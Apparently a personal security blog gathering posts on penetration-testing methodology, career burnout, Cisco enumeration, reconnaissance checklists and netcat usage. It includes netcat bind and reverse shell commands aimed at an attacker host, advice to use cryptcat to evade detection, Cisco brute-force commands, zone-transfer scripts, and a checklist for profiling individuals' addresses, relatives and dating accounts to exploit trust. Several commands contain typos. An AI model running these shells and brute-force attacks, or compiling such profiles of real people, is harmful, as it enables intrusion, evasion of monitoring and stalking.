PENTRN OffSec Penetration Testing Procedures (POPTP)?
cmdjunkie
In my endless quest to become a better programmer, hacker and penetration tester, I’ve realized that there is a nice balance between having the knowledge, applying pure skill and procedural methodology.  I’ve read numerous times that good programmers are born not made; you ‘ve either got it or you don’t.  As much as I hate to admit it, I think this is somewhat accurate.   Given, you can probably excel at anything you’re genuinely interested in getting better at, but you can’t make someone into a good programmer if they one, don’t care, or two, don’t have what it takes.  Programming is not about procedure, it’s a way of thinking that is exerted through intellectual application.  This is why software engineering is different from information security.

Information security on the other hand, is highly procedural.  There’s hardly any abstract thinking involved and it best functions when there are rules and methodology to follow.  Security involves being thorough and identifying anomalies that may introduce risk or grant unauthorized access.  Security isn’t a science in that there’s no real way to test something and ensure that it’s 100% bullet proof.  When it comes to penetration testing, one cannot just whip out their guns and start firing at whatever is in front of them.  This is the true difference between software engineers and security folk.  Security folk, as much as I might get reamed for this, aren’t necessarily creative.  They’re good at following instructions.  Engineers tend to be visionaries, imagining something up and devising a plan to build it from scratch.

But I digress, because I’m drifting.  As a software engineer, I enjoy building things that stem from just the ether of my imagination.  I do however, want to continue to improve my penetration testing capabilities as I think it pretty much improves my overall hacking abilities.  Yes, my entire professional career is based around the fact that I’m chasing the title.  And not the title of senior engineer bla blah, or CIO of Corporate Company Inc… it’s the title of hacker; but more on that later.

When it comes to penetration testing, there absolutely have to be procedures to follow, otherwise it’s easy to get off track and lose where you are.  When specific procedures are followed, it’s easy to stay organized, and document your findings.  It’s also easy to stop, take a break, and pick up where you left off because you’re just going down a list.  Hacking, in the penetration testing sense is methodical.  Step 1, scan the network for open ports.  The skill that’s involved is how much you know about networks and how you can creatively accomplish the steps within the list you’re following.  All steps become tasks, tasks that can be accomplished any number of ways.

So with all that being said, penetration testers have their own procedures that they follow when they’re performing assessments.  I think it’s important to thoroughly develop your own procedures and follow them appropriately, adding new steps or tasks as your craft improves.  My theory consists of having a collection of procedures that apply to penetration tests from both a broad and specific perspective.  For example, procedures should be followed when gathering information on a target.  This should be a thorough list that is compiled with a documentation regimen that can be easily referenced and interpreted.


The following is my outline for procedures of which to develop to improve my penetration testing experience:

High Level Penetration Testing Procedures (HLPTP)
R (Reconnaissance)
E (Enumeration)                                                                                                          
A (Access or Attack)
M (Maintaining Access)
C (Covering Tracks)

Vulnerability scanners are noisy and unreliable because they generate a lot of false positives.  It’s more important to learn how to test these assets manually, using common tools for enumeration.

Network Component Penetration Testing Procedures (NCPTP)
Windows Servers Windows XP Penetration Proc
Windows 7 Penetration Proc
Windows Server Penetration Proc
Windows SQL Server Proc
Identify what services are running
Check for RPC/DCOM vulnerabilities
Check for NULL Sessions
Unix Linux Servers *Nix Workstation Assessments Proc
*Nix Server Assessments Proc
Network Routers Cisco Switch and Router Enum Proc
VPN Endpoint Assessment Proc
Network Firewalls Firewall Security Assessment Proc
Web Server Testing IIS Server Security Assessment Proc
                                                       

I can envision an application that allows you to click through these procedures, eventually getting down to the steps to follow for the specific category you’re in.  This would make penetration tests easy to perform because the procedures are all in one place.  It’s basically all about enumeration.  You’re looking for holes in some network resource that could be exploited.  Without following specific procedures, these holes will not be found; at least not all of them.  The Enumeration phase is of the utmost importance.   And if you’re like me and you work for a company, this type of activity should be going on all the time.  That’s essentially what they’re paying you for.. to find the holes in the assets that are critical to business operations.. Hell, if you’re not doing it, who is?

From business perspective, you could take one category of Enumeration and focus on that all week, generating a report to discuss at the next security status meeting.  One week you can focus on Windows XP machines, and the next, just target the SQL servers in the environment.  This is a much more methodical way of working, which would work. 

PENTRN Offsec Training Module
cmdjunkie
The PENTRN OffSec Training Module is something I’ve been hacking together for a while.  Back in 09 when I started to purchase books like the Amazon junkie that I am, I found myself consuming too many techniques which would eventually just become theory because I wasn’t practicing them enough.  I became consumed with trying to memorize syntax because I knew what I wanted to do, but I didn’t always remember the correct sequence of characters that would allow me to pull off the technique.  I began to realize that the majority of the attacks/techniques I was absorbing could be broken down into three primary categories:

1.) Technique
2.) Syntax
3.) Description

A technique is basically the name of whatever sequence of commands you’re executing.  For example, when you know you need to perform a man in the middle attack from a victim to a gateway in order to retrieve and analyze the traffic between them, do you really need to have the way in which it’s done memorized?  All you need to know is that you need to perform this technique/attack.  It’s about knowing what you have to do; which is the fundamental idea of it all.
The syntax of a technique is how it’s performed.  It’s the way in which you throw the command at the shell.  The syntax can be a one-liner or an entire sequence of commands that are performed in order to execute the technique/attack.  A one-liner technique would be something like “Sniff specific protocol traffic” with the syntax equating to “tcpdump icmp”.
The Description is relatively self-explanatory.  The Description describes why you would use this and in what types of situations.  I felt this was needed as well as important because it supplies context to the technique being performed.

UPDATE:  I realized that the tool was practically worthless unless it had a search feature built in.  This was completed a couple of days ago, and I'm happy to say that it's working quite nicely.  I've already found ways in which to use it in my regular work day, so I can't wait to have some more time to expand upon it.

The nice thing about it is the fact that the data resource is an XLS file.  It's easy to modify the data, edit or add new entries.  It's fully dynamic so as long as you're following the correct syntax and data structure the module will read the file accordingly.

In addition, my new project is a penetration testing procedural module that will put penetration testing procedures all in once place.  It's very likely that I'll combine the PENTRN Training Module with the Proc module as it seems like the majority of the training module techniques and methods would be under the "Access or Attack" phase of a penetration test.  More to come.  And I'll get around to making the Beta version of the PENTRN module available this weekend.

Cheers.

Security: A Practice in Futility
cmdjunkie
Why is it we do the things we do?  Why is it we try to learn as much as we can about this ever growing “industry” when we know… yes, we absolutely know that there’s nothing we can do.  I suppose some do it for a paycheck because right now the money’s good (I’m guilty of this), but can we honestly say we’re making progress, doing what we’re being paid to do; secure assets?

Maybe I’m just becoming far too jaded and cynical, but I really don’t see the point of this shit anymore.  I’m far more interested in just building good, functional software.  I believe that security starts with development, and building secure apps; something that is not really being taught at the university level let.  I’m sure they’ll catch up in a couple of years…

As far as security goes, I stand by my opinion that it’s a practice in futility.  The industry is too broad to master.  There are too many pieces of security and that’s where it’s the most vulnerable.  One cannot become “good at security” because it’s just too damn wide (and deep).   Security needs to be split up into defined fields of practice, and those fields are what need to be studied.  There needs to be a level of specialization, but I suppose that only comes with time.   

One can and will drive themselves crazy working in this field because we’re up against adversaries that we cannot defend against.  We’re up against an enemy that we can’t see, that we have no idea where they’re coming from and we only really have a fixed amount of time before we have to throw in the towel and say, “welp… gotta get back to work”.

It’s the late nights working on some outrageously tedious issue to trying to keep your skills relevant while you maintain some level of security at your place of employment that makes everything seem pointless.  When does it end?  When can we really take a break?  Some will argue that this is a good thing because InfoSec people will always have something to work on.  Is this really a good thing?  This means that everything was built without security in mind, so everything needs a little bit of attention.  At this point, everything is an attack vector.  Everything can be used in a exploit chain.  How do we cover all of that as security folks?  Why would we want to stress ourselves out thinking about this shit day in and day out?

When can we stop keeping our ear to the ground?  We can’t, because the second we do we’re at risk of compromise.  The second we let our guards down and stop learning new things, or stop actively defending against the major threat vectors we increase our risk of being owned.

I happened to get into this field because I had an interest in it.  My interest turned into a career; one that I’m not sure I want to keep pursuing professionally.  I’m so stressed out.  I’m losing sleep.  I’m constantly trying to improve my skills and what I know, but the more I learn and the more I increase my skill set, the more I realize how fucking pointless all of it is. 

subjust lines a planty
cmdjunkie
It's late.

PENTRN module is progressing nicely, with the latest implemented feature a dynamic discipline switch within the GUI.  It's got potential, simply because I want to use it.  I look forward to researching and engineering a search feature, as well as a pattern matching system that can be used to match syntax input from the user to a wide range of acceptable entries.

I'm not sleeping well.  Why am I still awake.

I'm giving a talk at a local community college.  It should internet well.  

Cisco Enumeration
cmdjunkie
Locate: v. To perform actions in attempts to enumerate or footprint.  These actions do not attempt to alter targets, they are to identify them.  This is important as it narrows down Points of Entry and saves time.  The first step is to Locate potential targets.  
Attack:  v. To perform an action with the intent of adverse results.  An attack can be anything you initiate that will affect some aspect of the network/system you’re targeting, be it the destination device/server or the network itself.  An attack can be a SynFlood, a bruteforce attack, a spoof, an MITM technique, etc.  Attacks exploit the rules of a system.  
Exploit: v. To initiate a targeted action on a specific vulnerable platform to generate specific results.  
Before you attempt to follow these procedures, you should know exactly what you want to do with the router, after you’ve gained access to it.  Make sure you do your research and familiarize yourself with the cisco device (and version) you’re targeting so you know exactly what it is you need to do once you gain access to the device.  

Tool Description
CAT (Cisco-Auditing-Tool) Bruteforces the telnet service running on cisco devices.  This tool is useful if you have a lot of Cisco devices to audit.  You can feed it a list of nodes and check basic SNMP community strings and telnet passwords.  
Ciscos Ciscos scans a network range for cisco routers that haven’t had their default passwords changed from cisco.  This type of enumeration could turn up some interesting results.  
Cisco-Torch.pl An all in one enumeration tool.  (Telnet, SSHd, SNMP, config, NTP, TFTP, webserver, IOS, https)

Technique Syntax Example Context
Brute force Cisco Telnet Auth
./CAT –h 10.176.3.21
CAT will throw a series of passwords at the default telnet port of any host you direct it at.  Good for checking default configs
Enumerate default configs
./ciscos 10.1.121 3 –C 10
Scans for default configs on the C class with 10 threads.  
Cisco Enumeration (All)
./cisco-torch.pl –A 10.10.0.0/16
Performs all fingerprint scans available to cisco-torch.  (Telnet, SSHd, SNMP, config, NTP, TFTP, webserver, IOS, https)
Cisco Bruteforce Attack
./cisco-torch.pl –s –b –F hostfile.txt
Performs a canned sshd bruteforce attack on the hosts specified in the hostfile.txt
Cisco Web Server Scan
./cisco-torch.pl –w –z 10.10.0.0/16
Performs a web auth scan for cisco devices that have open web servers

##Tool Potential##
Python Script that would perform all of these commands, append the results to one big file and parse it out so the results are easily readable.  

The steps of compromise are to enumerate, identify vulnerabilities, plan the attack sequence, and exploit.  In any case, you are to find all cisco devices on the network and then purge through them looking for devices that have out-of-date firmware or known vulnerabilities.    The Cisco Global Exploiter (cge) has a nice collection of exploits for cisco devices.  The following list are the cge vulnerabilities and the cisco devices they effect.  Keep in mind, cisco routers aren’t updated as commonly as other resources on a network.  It takes an outage window and some downtime to perform updates.  When attempting to compromise cisco devices, follow these procedures:
  1. Enumerate the network to locate all reachable cisco devices
  2. Fingerprint the discovered servers (version, ios version, etc.)
  3. Check for default configurations (Creds, SNMP strings)
  4. Cross reference discoveries with known vulnerabilities

The Motivesto
cmdjunkie
The motivation behind the obsession we have with the things we do is about power.  It has everything to do with the ability to think, "I can own you if I want to".  Because the truth of the matter points to the idea that it doesn't matter what you do, or what level of success you've obtained, you rely on technology to do everything.  When the reliance on technology becomes a dependence, it’s individuals like myself…ourselves, that then have all the power.  

But there’s more to it than that these days.  This curiosity, this lifestyle, it is all leading up to something much more meaningful and significant.  I see it every day on my new feeds and in the broadcast news, a storm is brewing; we’re in the beginning stages of a silent war.  It’s a new age war, and believe it or not, it’s happening right now.  It is us, my people, and my digital brethren that will be responsible because we are the ones that understand this new threat.  

Fundamentals of Initials
cmdjunkie

Oftentimes we just don’t know where to begin.  There’s so much to explore and research, it’s almost impossible to cover all of the bases.  This is where a checklist comes into play.  A checklist… well, more like some guidelines to walk through as you begin information gathering

Information gathering is of the utmost importance.  Penetration Testing requires you to be an excellent researcher; one that can use conventional and non-conventional means of gathering information.  To identify the areas that should be performed almost immediately are the following:

1.) G2 – What I like to call the G2, is the Google 2.  This means, the absolute first thing you do is spend at the least, 2 hours researching your target using Google.  Bust out the Google Hacking ref and start getting creative with searches. Here are some Initial G2 Steps to Take (IG2ST):

a.      Identify the Web Server and Version Number

b.      Perform a //:googleSite:: to Identify Reachable and Indexed Hosts

c.      Identify Vulnerabilities for Target’s Web Server Version (Low Hanging Fruit [LHF])

d.      Search and Archive any Exploits for Discovered Vulnerabilities

e.      Search for Reachable Office Files (DOC, PPT, XLS, ADB, VSD)

f.       Search for Login/Password Pages

g.      Search for PDF Files

h.      Search for Email Addresses

After you feel satisfied with your findings, go back, review what you have and organize it in a suitable, and manageable manner

2.)Email Harvest – Right off the bat, when you perform the Initial Mandatory Email Harvest (IMEH), you obtain the target’s naming convention, micro-targets inside (or associated with) the Main Target, as well as Individuals that lead to secondary points of access/entry.  Alternatively, if your target is an individual, this step should be to gather a Contacts and Associates List (CAL).  They both should be organized the same way and expanded upon as information about each Individual/contact is delved into.

# goog-mail.py target.com


There are certainly more ways to harvest emails from a web site or the web.  Just be sure to organize them well.  After you've got a significant list, spend some time researching a couple of them.  Maybe you'll find one that looks like an easy target to exploit.  Maybe you'll find one with an online dating account.  The object here is not to look at the emails as just addresses, but as Assets, and PPOE.  This becomes a matter of trust exploitation because familiarity breeds trust.  As does association, obviously.  

Researching an Asset

  1. Search for email address
  2. Identify secondary email address (personal, business, legacy)
  3. Identify Real Name
  4. Identify Address
  5. Identify Phone Number
  6. Identify Former-Address
  7. Identify High School and College
  8. Identify Social Networking Presence
  9. Identify Online Dating Presence
  10. Identify at least 5 friends or associates.  (Family, Co-workers, ex's, College Friends, Roommates, etc.)

3.)Perimeter Enumeration – For a company, this is performed by identifying all Potential Points of Entry (PPOE) in the Public Facing systems that are available to the Internet.  This step includes:

a.   Identify the network ranges owned and operated by the target
# whois [target.com]
# dig [target.com]

b.   Identify the mail servers
# nslookup set type=mx [target.com]

c.   Identify the DNS Servers
# nslookup set type=ns [target.com]

d.   Perform a Forward Lookup Bruteforce (FLB)

e.   Perform a reverse lookup bruteforce on the network ranges owned and operated
# for ip in $(seq 1 255); do host 216.200.241.$ip | grep "domain name pointer"; done

f.       Attempt a Zone Transfer on the DNS Servers Identified

#! /bin/bash

Echo “[+] Enter domain name:”

read domain

for fqdn in $(host –t ns $domain | cut –d “ “ –f4)

host –l $domain | grep “has address”

done

These should be steps taken as the first thing you do, regardless of whether you’re just peepin, or actually on a job.  The reason being, is because this is non-intrusive enumeration that happens very often.  It would be difficult to identify malicious intent from a NSD’s perspective because whois and ns queries are very common place among typical inbound traffic into private networks.  Typical probes.  Although the attempted Zone Transfers can trigger low impact alarms they are still very common place and any admin worth his/her salt should have zone transfers disabled

More to Come


Network NC Shell Review
cmdjunkie

Network Shell Review:  Having a shell flying through a network is malicious.  Most IDS solutions will identify a shell traversing a network segment quicker than you can say, “busted”.  To get around that, use cryptcat when placing shells on a system.  The file is larger, but the method is hard to detect.   

Netcat Uses:

Bind_Shell:  A bind shell is a shell server waiting to be connected to.  A bind shell works by spawning a shell command line when the listening port is connected to.  In netcat, you can fire up a bind shell with the follow commands:

WIN: >> nc –lvp 443 –e c:\windows\system32\cmd.exe

NIX: >> nc –lvp 445 –e /bin/bash

Be sure to swap out nc for cryptcat when you get a chance

Reverse_Shell:

A reverse shell is an outbound connection that’s carrying the shell with it in transit.  Like I mentioned above, this is not a new attack or technique.  Most IDS systems will identify a cmd.exe or bash shell being sent out to the Internet.  In fact, most AV systems that are minimally kept up to date will probably quarantine nc.exe before it even has a chance to execute.  Anyway here’s a reverse shell

Attacker:  WIN >> nc –l –p 443

Target: NIX >> nc –nv the.attackersip.net 443 –e /bash/bin

HoneyPot NC:  Honeypots are dummy systems, setup to represent real systems that look appealing to attackers.  A crafty way to setup a linux machine to look like a Windows machine to attackers is to use netcat to open standard windows ports.  You can catch all type of good stuff:

#!/bash/bin
while[1];
nc –l –p 137 >> capture.txt;

nc –l –p 139 >> capture.txt;

nc –l –p 445 >> capture.txt;

done

Port Redirector: Netcat is useful for redirecting ports as well.  Use the following command to act as a proxy server:

# nc –l –p 8888 –c “nc google.com 80”

Once you connect to this machine on port 8888, you have a connection to google.com on 80.  Run a quick HTTP get and watch the server ID come back to you

--EXTRAS:

Persistent Netcat Listener

# while [1]; do echo “Started”; nc –l –p 41523 >> capture.txt; done


Corporate Security, Software Engineering and the Truth of the Industry
cmdjunkie

A little background: I’ve been a Security “Professional” since 2007.  I started at a small company that just did consulting and eventually went to work for the government for 4 or so years.  Over time, my idea of what Security work should be and what it actually was grew further and further out.  Eventually, I found myself versed and experienced enough to really see the trouble that lies ahead.  Yes, I started to realize the absolute inevitability of working in Information Security for a mid-large sized financial organization; there’s nothing you can do to prevent problems and headaches… just detect it, and respond to it appropriately and get back to work.

Business Security: Information Security in a corporate setting, characterized by misused talent, security budget meetings and fancy pie charts for management.  Business Security in all its glory is just another department in your typical, large, office building.  Business Security is doing a product analysis to determine what DLP solution you want to implement over the next quarter or two.  Business Security is being forced to listen to users complain about VPN connectivity when you know damn well it’s their home internet connection.  Business Security is satisfying your direct reports… and their direct reports… and their direct reports.  Business Security is going to the security conventions to network and pass out your new business cards with that shiny new minted CISSP accreditation appended to your name.

Business Security is what’s wrong with Security.

But it keeps money in your wallet and food on the table you say?  This is true, but it comes with the cost of your dignity and reputation.  Business Security is a farce.  The allegedly more secure firms and organizations are still at risk of compromise because all it takes is a dedicated attacker.  Seriously, let me repeat that, all it takes is a dedicated attacker.

It’s not a matter of if you’ll get attacked, it’s when.  Everyone at this point is at risk and as a security professional, there’s really nothing you can do to stop it.  And consequently, you’ll wind up getting blamed.  How can you possibly work to secure every single attack vector your company has implemented in order to appease the employees?  Personally, I’m the sole security engineer for my company.  Given, it makes me feel great that I’ve found myself in this position, but at the same time, I’m well aware of what’s possible, what criminals are capable of, and how they can and will go about doing it.  It’s a stressful profession, and I don’t like stress.

Now, I’ve been in school for Software Engineering for the better part of 3 years.  Technically, I’m a junior, but similar to my high school experience, I should have graduated by now.  Anyway, I find software development to be the absolute panacea to hyper-paranoid security work.  As a programmer, I can literally just conjure up an idea and make it happen.  As a programmer, I can turn thought into reality.  I can build tools, bridges, communication means, secure transport options, automated robots, slick interfaces, and digital gateways to real world information.  Programming and Software Construction is the art of transforming brainwaves into an intangible interactive product.  Programming is rooted in creativity and logic.  Not only that, but when the solution is built and the requirements are met, you’ve completed something, and you’ve created something as well.  Software developers are essentially the Gods of the virtual world.  We create the cities, communities, tools and metaphorical vehicles that allow people to navigate and live in these worlds.  There’s a power complex to it, and each programmer will tell you they’re a genius in their own mind.

The security world has a few subdivisions that should be mentioned, as not all security personnel are the same.  Consider the idea that InfoSec has skyrocketed in the last 10 years as not only a lucrative career, but as a general item of business interest. It has become a hot topic and a magnet for confused college graduates trying to get a good paying job.  Entry into the field is simple if you’ve obtained a CISSP (which is a bootcamp and a $500 test fee away) in addition to the degree in Art History you managed to obtain.  These watered down newly minted CISSPs find their ways into a companies’ risk management team and voila, 65k/year and the ability to say you work in InfoSec.  Now, I’m not saying these people are worthless, because they do have their purpose.  I’m saying they’re should be divisions within Security and because there aren’t, these individuals get grouped with guys like myself

--Guys like myself…  Now before I delve into the security guy that I represent, allow me to briefly touch upon the hardcore security junkie.  The hardcore security junkie is the guy that has no social life but seems to basically know everything there is about security.  Hardcore Sec Junkies write highly specialized books on specific topics, blog endlessly about their research, and still have time to watch their companies’ network.  These are the people that wind up going into business for themselves doing security consulting because they’re that damn good.  These are the guys you want working for you, not against you.  Often times, these guys will have a couple of SANS certs, a published white paper and an affinity for energy drinks.  (Generalization, I know… don’t hate).  These guys you should know exactly what to do with… put them in the basement, let them hack.

Now… Security guys like myself are enigmas.  Personally, I’m not obsessed with security.  Oftentimes I just want to go home and leave my desk alone.  I hardly ever do that, but I do get burnt out.  Guys like myself I like to refer to as idealistic generalists.  I (we) have an idealistic point of view when it comes to the internet, computer use, security, and software development.  The world is bigger than Defcon and Blackhat.  The idealistic security generalist should actually not have the word security in the description.  I don’t want to put myself in a box and call myself a security professional; I’m so much more than that.  I actually like to program.  It’s my chosen career choice.  I like to go out and meet people, flirt with women and stay active.  I realize that I’m never going to have the time to become as incredibly deadly as I want to be with BackTrack but you know what?  That’s okay.  I’ve said it before and I’ll say it again, security is too wide spread to be mastered, and that’s where the problem is.

Personally, I’d rather study software engineering, which actually has limits to the foundations on which you learn.  Given, there’s still a lot to learn, but the difference is in the execution.  As a programmer, you can take a learned concept and apply it in many different ways, only limited by your skill-set as a programmer and your imagination.  There are no limits in programming and software development once you solidify your fundamental understanding of current construction models and trends (e.g. OOP).  As a programmer, you’re only responsible for the attention you've paid to the code that you’ve written.  You’re limitless; without limits… no limits.  Security on the other hand is one big prison that gets smaller and smaller the more you become aware of security concepts.  I challenge any seasoned security professional to tell me they sleep well at night because they’re sure that nothing can go wrong.  When you’re a security professional and you’ve trained your brain to think the worst, to consider the weak points of compromise and to find methods of circumvention, everything is insecure to you.  Security is not necessarily something you can be good at; it’s just something you increasingly become more versed in.  When you continue to practice security you start to realize that everything you do is pretty much useless because you’re aware of what the guys that have all the time in the world are capable of.  Nietzsche said, “whoever battles monsters should take care not to become a monster too, for if you stare long enough into the abyss, the abyss stares also into you”.  To relate that to the Security Profession, when you’re in the trenches, reading about new exploits every day and the crackers that write them, you start to understand that you’re fighting a losing battle

So for the aspiring security professional I would really give it some thought as to what you think you’re getting into.  Do you want to get in as a non-technical analyst, perform some risk assessments and work your way up the corporate ladder, ultimately winding up in an executive security position?  Do you want to learn how to “haxx computers”?  Are you getting into the industry because all you’re seeing these days are computer security positions?  Or are you really just a programmer that wants some more excitement and increased responsibility?  Whatever your true intentions, please realize that you will be fighting an army of men and women who will sit around for hours, upon days, upon months, just to come up with effective ways to break into your network, and you’ll likely have no way to prevent it.  You’ll spend the majority of your time putting in third-party systems that you hope will bring you some peace of mind, only to get owned by a crafty South American cracker that was targeting cute and susceptible, security ignorant Ashley, over there in Marketing.  There is no way to stop the coming storm.  There is nothing you can do.

If you’re just into technology and you want to work on computers, why not just become a programmer?  It’s actually obvious… it’s because most people don’t have the capacity to be a good programmer.  Most can’t fathom the thought of sitting at a console for 8+ hours, pecking away at source code, trying to hammer out a solution.  I tell you what, it’s a better alternative than driving yourself crazy with the thought of the cyber-boogieman getting access and lurking through your network, stealing your company’s intellectual property and making off with it, only to blame you for your negligence.

I have techno-lust.  I love computers, programming, security, games, operating systems and just cool shit that can be done with software.  It’s what I’m good at, and the more I hone my programming abilities, the more I want to pursue software engineering than security.  Security – more specifically Business Security -- has absolutely nothing to do with technology.  It’s about policy, control and people.  If you want to work on security systems and really do cool security work, you either work for a SOC (eh), or go to graduate school for computer security research.  Do not be fooled by the promise of exciting work and catching digital bad-guys.  It’s hardly the reality of the security industry.

In conclusion, computer science/software engineering is the way to go in my humble opinion if you’re like me. If you’re creative, inventive and logical, try some programming, you might enjoy it and find your calling.  To me it’s a philosophical thing.  I’m an idealist and I find absolute euphoria in creating something that originated in the confines of my consciousness.

To those MBAs, or recent college grads that just want a good, decent paying job right out of college, go get your CISSP and put your resume out there.  You’re the one’s the businesses need.  You’re the ones who don’t code, who aren't technical and wouldn't be caught writing a script if they had a gun to their head.  Businesses need you and your CISSPy attitudes.  Businesses need those shmucks to talk it up in meetings and explain risk ratings to security naive executives.

For those hackers out there that want to make money doing what they love, DO NOT pursue a position in security (business security). You will be absolutely miserable, forced to perform tasks that are mind-numbingly boring compared to what you want to do.  Get out there and go get that coveted C-EH, OSCP, GPEN, etc., and then go find a security consulting company that can take you under their wing and teach you the ropes.  Stay away from the businesses.  They think they need you, but they don’t.


Violent Python for the Win
cmdjunkie
If you haven't picked up TJ O'Conner's new book Violent Python, I certainly recommend it.  IMHO, it's the best book on what I like to call Security Software Engineering (See earlier post for a more detailed definition).  Anyway, the book's got some great examples as to how to do specific security related tasks using python.  The examples are clean and easy to understand which means they leave a lot left to the practitioner to get creative with the code; and that's where I come in.  I'll be posting code samples from my learnings and sharing them, adding some commentary and adding a Network Attack Abstract (NAA) with the standard ITPE (Interface/Requirement, Tools, Procedure, Exercises) for fun.  Cheers.  

You are viewing cmdjunkie